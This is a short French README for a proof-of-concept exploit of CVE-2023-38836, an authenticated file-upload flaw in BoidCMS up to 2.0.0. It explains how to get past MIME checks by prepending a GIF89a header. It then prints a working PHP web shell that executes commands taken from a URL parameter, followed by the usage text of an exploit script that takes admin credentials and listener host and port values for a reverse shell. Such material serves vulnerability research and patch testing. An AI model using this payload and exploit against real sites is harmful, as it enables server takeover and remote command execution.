
Exploit PoC pour une vulnérabilité de téléchargement de fichier dans BoidCMS version <=2.0.0
Vulnérabilité de téléchargement de fichier dans BoidCMS v2.0.0 permet à un attaquant authentifié de télécharger un fichier de type dangereux (CWE-434).
Pour exploiter, un attaquant pourrait ajouter un en-tête GIF pour contourner les vérifications de type MIME.
GIF89a;
<?php system($_GET["cmd"]); ?>
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]
Exploit pour CVE-2023-38836
options:
-h, --help affiche ce message d'aide et quitte
-u URL, --url URL URL du site web
-U USER, --user USER nom d'utilisateur admin
-P PASSWD, --passwd PASSWD
mot de passe admin
-l LHOST, --lhost LHOST
hôte d'écoute
-p LPORT, --lport LPORT
port d'écoute
